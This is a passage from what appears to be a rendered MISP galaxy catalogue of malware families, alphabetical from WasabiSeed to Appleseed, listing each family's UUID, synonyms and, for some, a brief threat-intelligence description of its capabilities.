WasabiSeed

Internal MISP references

UUID 0c6568da-7017-4d9f-b077-0c486b3f9057 which can be used as unique global reference for WasabiSeed in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WhiteShadow

Internal MISP references

UUID dc857b7d-f228-4aa5-9e89-f7e17bb7ea8c which can be used as unique global reference for WhiteShadow in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

000Stealer

Internal MISP references

UUID 24e598cf-4c55-468a-ac1d-cc4f89104943 which can be used as unique global reference for 000Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

0bj3ctivityStealer

Information stealer, based on strings it seems to target crypto currencies, instant messengers, and browser data.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular 0bj3ctivityStealer.

Known Synonyms
`PXRECVOWEIWOEI`

Internal MISP references

UUID ac22ee6f-0d15-4edb-8ea5-1675df57597c which can be used as unique global reference for 0bj3ctivityStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

3CX Backdoor (Windows)

According to CrowdStrike, this backdoor was discovered being embedded in a legitimate, signed version of 3CXDesktopApp, and thus constitutes a supply chain attack.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular 3CX Backdoor (Windows).

Known Synonyms
`SUDDENICON`

Internal MISP references

UUID b6a00e25-9d8d-4ebc-b9fc-7fd41797303b which can be used as unique global reference for 3CX Backdoor (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

404 Keylogger

Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim’s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular 404 Keylogger.

Known Synonyms
`404KeyLogger`
`Snake Keylogger`

Internal MISP references

UUID 6b87fada-86b3-449d-826d-a89858121b68 which can be used as unique global reference for 404 Keylogger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

4h_rat

Internal MISP references

UUID 823f4eb9-ad37-4fab-8e69-3bdae47a0028 which can be used as unique global reference for 4h_rat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

5.t Downloader

Downloader used in suspected APT attack against Vietnam.

Internal MISP references

UUID 685c9c30-aa9f-43ee-a262-43c17c350049 which can be used as unique global reference for 5.t Downloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

7ev3n

The NJCCIC describes 7ev3n as a ransomware "that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n."

Internal MISP references

UUID ac2608e9-7851-409f-b842-e265b877a53c which can be used as unique global reference for 7ev3n in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

8Base

The 8Base ransomware group has remained relatively unknown despite the massive spike in activity in Summer of 2023. The group utilizes encryption paired with “name-and-shame” techniques to compel their victims to pay their ransoms. 8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries. Despite the high amount of compromises, the information regarding identities, methodology, and underlying motivation behind these incidents still remains a mystery. Samples of their ransomware show they are using customized Phobos with SmokeLoader.

Internal MISP references

UUID 7ee60640-29cd-4127-b805-1f2b753e9e15 which can be used as unique global reference for 8Base in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

8.t Dropper

8T_Dropper has been used by Chinese threat actor TA428 in order to install Cotx RAT onto victim's machines during Operation LagTime IT. According to Proofpoint the attack was developed against a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. The dropper was delivered through an RTF document exploiting CVE-2018-0798.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular 8.t Dropper.

Known Synonyms
`8t_dropper`
`RoyalRoad`

Internal MISP references

UUID df755d5f-db11-417d-8fed-b7abdc826590 which can be used as unique global reference for 8.t Dropper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

9002 RAT

9002 RAT is a Remote Access Tool typically observed to be used by an APT to control a victim's machine. It has been spread over via zero day exploits (e.g. targeting Internet Explorer) as well as via email attachments. The infection chain starts by opening a .LNK (an OLE packager shell object) that executes a Powershell command.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular 9002 RAT.

Known Synonyms
`HOMEUNIX`
`Hydraq`
`McRAT`

Internal MISP references

UUID bab647d7-c9d6-4697-8fd2-1295c7429e1f which can be used as unique global reference for 9002 RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Abaddon

Uses Discord as C&C, has ransomware feature.

Internal MISP references

UUID 97be2d1a-878d-46bd-8ee7-d8798ec61ef1 which can be used as unique global reference for Abaddon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AbaddonPOS

MajorGeeks describes this malware as trying to locate credit card data by reading the memory of all processes except itself by first blacklisting its own PID using the GetCurrentProcessId API. Once that data is discovered, it sends this data back to a command and control server using a custom binary protocol instead of HTTP.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AbaddonPOS.

Known Synonyms
`PinkKite`
`TinyPOS`

Internal MISP references

UUID a492a3e0-13cb-4b7d-93c1-027e7e69b44d which can be used as unique global reference for AbaddonPOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

abantes

Internal MISP references

UUID 27b54000-26b5-405f-9296-9fbc9217a8c9 which can be used as unique global reference for abantes in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.abantes - webarchive

Associated metadata

Metadata key	Value
type	[]

Abbath Banker

Internal MISP references

UUID e46262cd-961f-4c7d-8976-0d35a066ab83 which can be used as unique global reference for Abbath Banker in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker - webarchive

Associated metadata

Metadata key	Value
type	[]

ABCsync

Internal MISP references

UUID 1e6afd04-d7d1-43a0-9ca5-082d418bd397 which can be used as unique global reference for ABCsync in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AbSent Loader

Internal MISP references

UUID 532d67fc-0c93-4345-80c4-0c1657056d5e which can be used as unique global reference for AbSent Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ACBackdoor (Windows)

A Linux backdoor that was apparently ported to Windows. This entry represents the Windows version. It appears the Linux version was written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.

Internal MISP references

UUID 9aa1a516-bd88-4038-a37d-cf66c607e68c which can be used as unique global reference for ACBackdoor (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ACEHASH

ACEHASH is described by FireEye as combined credential harvester that consists of two components, a loader and encrypted/compressed payload. To execute, a password is necessary (e.g. 9839D7F1A0) and the individual modules are addressed with parameters (-m, -w, -h).

Internal MISP references

UUID 51f8c94a-572f-450b-a52f-d3da96302d6b which can be used as unique global reference for ACEHASH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AcidBox

Unit42 found AcidBox in February 2019 and describes it as a malware family used by an unknown threat actor in 2017 against Russian entities, as stated by Dr.Web. It reused and improved an exploit for VirtualBox previously used by Turla. The malware itself is a modular toolkit, featuring both usermode and kernelmode components and anti-analysis techniques such as stack-based string obfuscation or dynamic XOR-encoded API usage.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AcidBox.

Known Synonyms
`MagicScroll`

Internal MISP references

UUID 4ccc1ec4-6008-4788-95d9-248749f5a7fe which can be used as unique global reference for AcidBox in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AcridRain

AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more.

Internal MISP references

UUID ffc368a5-2cd0-44ca-869b-223fdb462c41 which can be used as unique global reference for AcridRain in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Acronym

Internal MISP references

UUID bee73d0f-8ff3-44ba-91dc-d883884c754e which can be used as unique global reference for Acronym in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym - webarchive

Associated metadata

Metadata key	Value
type	[]

ACR Stealer

First introduced in March 2024, ACR Stealer is an information stealer sold as a Malware-as-a-Service (MaaS) on Russian-speaking cybercrime forums by a threat actor named "SheldIO". Researchers posit that this malware is an evolved version of the GrMsk Stealer, which likely aligns with the private stealer that SheldIO has been selling since July 2023. The malware, written in C++, is compatible with Windows 7 through 10, and the seller manages all command and control (C2) infrastructure. ACR Stealer can harvest system information, stored credentials, web browser cookies, cryptocurrency wallets, and configuration files for various programs. Additionally, it employs the dead drop resolver (DDR) technique to obfuscate the actual C2 infrastructure.

Internal MISP references

UUID 9d80476e-7121-4eeb-a39f-689d8eb872ab which can be used as unique global reference for ACR Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Action RAT

Internal MISP references

UUID 57df4c54-3fff-49dd-9657-19265a66f5de which can be used as unique global reference for Action RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Adamantium Thief

Internal MISP references

UUID 28e01527-dbb5-4331-b5bf-5658ebf58297 which can be used as unique global reference for Adamantium Thief in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AdamLocker

Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.

Internal MISP references

UUID 1ed36f9a-ae00-4d16-bbf7-e97217385fb1 which can be used as unique global reference for AdamLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Adhubllka

Some Ransomware distributed by TA547 in Australia

Internal MISP references

UUID ebf31d45-922a-42ad-b326-8a72ba6dead7 which can be used as unique global reference for Adhubllka in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AdKoob

Internal MISP references

UUID ace3cb99-3523-44a1-92cc-9f002cf364bf which can be used as unique global reference for AdKoob in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AdvisorsBot

AdvisorsBot is a downloader named after early command and control domains that all contained the word "advisors". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing.

Internal MISP references

UUID e3f49ec0-614e-4070-a620-5196d45df7b5 which can be used as unique global reference for AdvisorsBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Adylkuzz

Internal MISP references

UUID 3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58 which can be used as unique global reference for Adylkuzz in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AESRT

Ransomware written using .NET.

Internal MISP references

UUID fb0eb7a8-ab32-4371-96b7-2d19f9064ac5 which can be used as unique global reference for AESRT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Afrodita

Internal MISP references

UUID 4c9f8ad2-ace4-42e5-ab70-efdfaad4d1bd which can be used as unique global reference for Afrodita in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AgendaCrypt

Ransomware written in Go.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AgendaCrypt.

Known Synonyms
`Agenda`
`Qilin`

Internal MISP references

UUID d430e861-07d3-442a-8444-0bf87e660c26 which can be used as unique global reference for AgendaCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Agent.BTZ

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Agent.BTZ.

Known Synonyms
`ComRAT`
`Minit`
`Sun rootkit`

Internal MISP references

UUID d9cc15f7-0880-4ae4-8df4-87c58338d6b8 which can be used as unique global reference for Agent.BTZ in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Agent Racoon

Agent Racoon is a .NET-based backdoor malware that leverages DNS for covert C2 communication, employing randomized subdomains and Punycode encoding to evade detection. It features encrypted communication using a unique key per sample, supports remote command execution, and facilitates file transfers. Despite lacking an inherent persistence mechanism, it relies on external methods like scheduled tasks for execution. The malware, active since at least 2020, has targeted organizations in the U.S., Middle East, and Africa, including non-profits and government sectors. It disguises itself as legitimate binaries such as Google Update and MS OneDrive Updater, using obfuscation techniques like Base64 encoding and timestamp modifications to avoid detection.

Internal MISP references

UUID f3dde421-0f6b-4a2e-b591-64820169ef1a which can be used as unique global reference for Agent Racoon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Agent Tesla

A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Agent Tesla.

Known Synonyms
`AgenTesla`
`AgentTesla`
`Negasteal`

Internal MISP references

UUID b88e29cf-79d9-42bc-b369-0383b5e04380 which can be used as unique global reference for Agent Tesla in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AgfSpy

The agfSpy backdoor retrieves configuration and commands from its C&C server. These commands allow the backdoor to execute shell commands and send the execution results back to the server. It also enumerates directories and can list, upload, download, and execute files, among other functions. The capabilities of agfSpy are very similar to dneSpy, except each backdoor uses a different C&C server and various formats in message exchanges.

Internal MISP references

UUID 405fe149-1454-4e8c-a4a3-d56e0c5f62d7 which can be used as unique global reference for AgfSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ahtapot

Internal MISP references

UUID 549b23b1-6f53-494e-a302-1d00aa71043b which can be used as unique global reference for Ahtapot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Akira (Windows)

Internal MISP references

UUID 834635f7-fb0f-472c-913e-fb112ae29fdc which can be used as unique global reference for Akira (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Albaniiutas

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Albaniiutas.

Known Synonyms
`BlueTraveller`

Internal MISP references

UUID dff7e10c-41ca-481d-8003-73169803272d which can be used as unique global reference for Albaniiutas in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Aldibot

According to Trend Micro Encyclopia: ALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.

This malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.

This bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.

This malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.

This backdoor executes commands from a remote malicious user, effectively compromising the affected system.

Internal MISP references

UUID 43ec8adc-0658-4765-be20-f22679097fab which can be used as unique global reference for Aldibot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Alfonso Stealer

Internal MISP references

UUID a76874b3-12d0-4dec-9813-01819e6b6d49 which can be used as unique global reference for Alfonso Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Project Alice

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Project Alice.

Known Synonyms
`AliceATM`
`PrAlice`

Internal MISP references

UUID 41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca which can be used as unique global reference for Project Alice in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Alina POS

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Alina POS.

Known Synonyms
`alina_eagle`
`alina_spark`
`katrina`

Internal MISP references

UUID 27d90cd6-095a-4c28-a6f2-d1b47eae4f70 which can be used as unique global reference for Alina POS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AllaKore

AllaKore is a simple Remote Access Tool written in Delphi, first observed in 2015 but still in early stages of development. It implements the RFB protocol which uses frame buffers and thus is able to send back only the changes of screen frames to the controller, speeding up the transport and visualization control.

Internal MISP references

UUID fb1c6035-42ee-403c-a2ae-a53f7ab2de00 which can be used as unique global reference for AllaKore in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Allaple

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Allaple.

Known Synonyms
`Starman`

Internal MISP references

UUID 6aabb492-e282-40fb-a840-fe4e643ec094 which can be used as unique global reference for Allaple in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AllcomeClipper

Allcome is classified as a clipper malware. Clippers are threats designed to access information saved in the clipboard (the temporary buffer space where copied data is stored) and substitute it with another. This attack is targeted at users who are active in the cryptocurrency sector mainly.

Internal MISP references

UUID 43ca1245-a5e0-4b44-9892-cf317170c7b8 which can be used as unique global reference for AllcomeClipper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Almanahe

Internal MISP references

UUID 352f79b1-6862-4164-afa3-a1d787c40ec1 which can be used as unique global reference for Almanahe in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Alma Communicator

Internal MISP references

UUID a0881a0c-e677-495b-b475-290af09bb716 which can be used as unique global reference for Alma Communicator in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AlmaLocker

Internal MISP references

UUID b5138914-6c2b-4c8e-b182-d94973fe5a6b which can be used as unique global reference for AlmaLocker in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker - webarchive

Associated metadata

Metadata key	Value
type	[]

AlmondRAT

AlmondRAT is a .NET Remote Access Trojan deployed by the Bitter APT group. It is capable of collecting system information, modifying and exfiltrating data and allows for remote command execution.

Internal MISP references

UUID c5fa22fd-5869-4a4d-b5fc-c3be18255d2e which can be used as unique global reference for AlmondRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ALPC Local PrivEsc

Internal MISP references

UUID 86517f1a-6e67-47ba-95dd-84b3125ad983 which can be used as unique global reference for ALPC Local PrivEsc in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Alphabet Ransomware

The Alphabet ransomware is a new screenlocker that is currently being developed by a criminal developer. As the malware is not ready it does not affect any user files.

The virus includes a screenlocking function which locks the user’s screen and prohibits any interaction with the computer.

Internal MISP references

UUID 5060756f-8385-465d-a7dd-7bf09a54da92 which can be used as unique global reference for Alphabet Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AlphaLocker

A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.

AlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.

AlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.

To decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter.

Internal MISP references

UUID c1b9e8c5-9283-4dbe-af10-45956a446fb7 which can be used as unique global reference for AlphaLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AlphaNC

Internal MISP references

UUID 6e94186c-987e-43da-be2d-9b44f254c8b9 which can be used as unique global reference for AlphaNC in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AlphaSeed

Internal MISP references

UUID 966c5a6d-16b8-43b1-acbd-163e904d4a03 which can be used as unique global reference for AlphaSeed in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Alreay

Alreay is a remote access trojan that uses HTTP(S) or TCP for communication with its C&C server.

It uses either RC4 or DES for encryption of its configuration, which is stored in the registry.

It sends detailed information about the victim's environment, like computer name, Windows version, system locale, and network configuration.

It supports almost 25 commands that include operations on the victim’s filesystem, basic process management, file exfiltration, command line execution, and process injection of an executable downloaded from the attacker’s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers, starting with values like 0x21A8B293, 0x23FAE29C or 0x91B93485.

It comes either as an EXE or as a DLL with the internal DLL name t_client_dll.dll. It may contain statically linked code from open-source libraries like Mbed TLS or zLib (version 1.0.1).

Alreay RAT was observed in 2016-2017, running on networks of banks operating SWIFT Alliance software.

Internal MISP references

UUID d258de39-e351-47e3-b619-731c87f13d9c which can be used as unique global reference for Alreay in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Alureon

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Alureon.

Known Synonyms
`Olmarik`
`Pihar`
`TDL`
`TDSS`
`wowlik`

Internal MISP references

UUID ad4e6779-59a6-4ad6-98de-6bd871ddb271 which can be used as unique global reference for Alureon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Amadey

Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.

Internal MISP references

UUID 77f2c81f-be07-475a-8d77-f59b4847f696 which can be used as unique global reference for Amadey in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AMTsol

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AMTsol.

Known Synonyms
`Adupihan`

Internal MISP references

UUID ce25929c-0358-477c-a85e-f0bdfcc99a54 which can be used as unique global reference for AMTsol in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Anatova Ransomware

Anatova is a ransomware family with the goal of ciphering all the files that it can and then requesting payment from the victim. It will also check if network shares are connected and will encrypt the files on these shares too. The code is also prepared to support modular extensions.

Internal MISP references

UUID 2a28ad28-8ba5-4b8b-9652-bc0cdd37b2c4 which can be used as unique global reference for Anatova Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Anchor

Anchor is a sophisticated backdoor served as a module to a subset of TrickBot installations. Operating since August 2018 it is not delivered to everybody, but contrary is delivered only to high-profile targets. Since its C2 communication scheme is very similar to the one implemented in the early TrickBot, multiple experts believe it could be attributed to the same authors.

Internal MISP references

UUID c38308a1-c89d-4835-b057-744f66ff7ddc which can be used as unique global reference for Anchor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AnchorMail

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AnchorMail.

Known Synonyms
`ANCHOR.MAIL`
`Delegatz`

Internal MISP references

UUID 7792096a-7623-43a1-9a67-28dce0e4b39e which can be used as unique global reference for AnchorMail in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AnchorMTea

Recon/Loader malware attributed to Lazarus, disguised as Notepad++ shell extension.

Internal MISP references

UUID 565de3f5-7eb7-43ca-a9d9-b588dfd6a50a which can be used as unique global reference for AnchorMTea in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Andardoor

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Andardoor.

Known Synonyms
`ROCKHATCH`

Internal MISP references

UUID 59a2437b-ae63-466a-9172-60d6610c3e19 which can be used as unique global reference for Andardoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Andromeda

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Andromeda.

Known Synonyms
`B106-Gamarue`
`B67-SS-Gamarue`
`Gamarue`
`b66`

Internal MISP references

UUID 07f46d21-a5d4-4359-8873-18e30950df1a which can be used as unique global reference for Andromeda in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AndroMut

According to Proofpoint, AndroMut is a new downloader malware written in C++ that Proofpoint researchers began observing in the wild in June 2019. The “Andro” part of the name comes from some of the pieces which bear resemblance to another downloader malware known as Andromeda [1] and “Mut” is based off a mutex that the analyzed sample creates: “mutshellmy777”.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AndroMut.

Known Synonyms
`Gelup`

Internal MISP references

UUID 85673cd4-fb05-4f6d-94ec-71290ae2e422 which can be used as unique global reference for AndroMut in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Anel

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Anel.

Known Synonyms
`UPPERCUT`
`lena`

Internal MISP references

UUID a180afcc-d42d-4600-b70f-af27aaf851b7 which can be used as unique global reference for Anel in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AnteFrigus

Ransomware that demands payment in Bitcoin.

Internal MISP references

UUID 04788457-5b72-4a66-8f2c-73497919ece2 which can be used as unique global reference for AnteFrigus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Antilam

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Antilam.

Known Synonyms
`Latinus`

Internal MISP references

UUID 02be7f3a-f3bf-447b-b8b4-c78432b82694 which can be used as unique global reference for Antilam in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam - webarchive

Associated metadata

Metadata key	Value
type	[]

Anubis (Windows)

According to Microsoft Security Intelligence, Anubis is an information stealer sold on underground forums since June 2020. The name overlaps with the Android banking malware but is unrelated. It contains code forked from Loki PWS.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Anubis (Windows).

Known Synonyms
`Anubis Stealer`

Internal MISP references

UUID b19c9f63-a18d-47bb-a9fe-1f9cea21bac0 which can be used as unique global reference for Anubis (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Anubis Loader

A loader written in Go, tracked since at least October 2021 by ZeroFox. Originally named Kraken and rebranded to Anubis in February 2022.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Anubis Loader.

Known Synonyms
`Kraken`
`Pepega`

Internal MISP references

UUID e65ca164-f448-4f8e-a672-3ff7ec37e191 which can be used as unique global reference for Anubis Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

APERETIF

Internal MISP references

UUID 573eb306-f6c7-4ba9-91a9-881473d335b8 which can be used as unique global reference for APERETIF in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Apocalipto

Internal MISP references

UUID d3e16d46-e436-4757-b962-6fd393056415 which can be used as unique global reference for Apocalipto in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Apocalypse

Internal MISP references

UUID e87d9df4-b464-4458-ae1f-31cea40d5f96 which can be used as unique global reference for Apocalypse in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Apollo

This is an implant usable with the Mythic C2 framework. Apollo is a Windows agent written in C# using the 4.0 .NET Framework designed to be used in SpecterOps training offerings.

Internal MISP references

UUID f995662c-27ad-440b-97ce-f1ecd2b59221 which can be used as unique global reference for Apollo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Apostle

Malware used by suspected Iranian threat actor Agrius, turned from wiper into ransomware.

Internal MISP references

UUID cb2d3a6f-8ff5-4b08-af95-7377cfe3f7c3 which can be used as unique global reference for Apostle in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AppleJeus (Windows)

Internal MISP references

UUID 2b655949-8a17-46e5-9522-519c6d77c45f which can be used as unique global reference for AppleJeus (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Appleseed

Synonyms

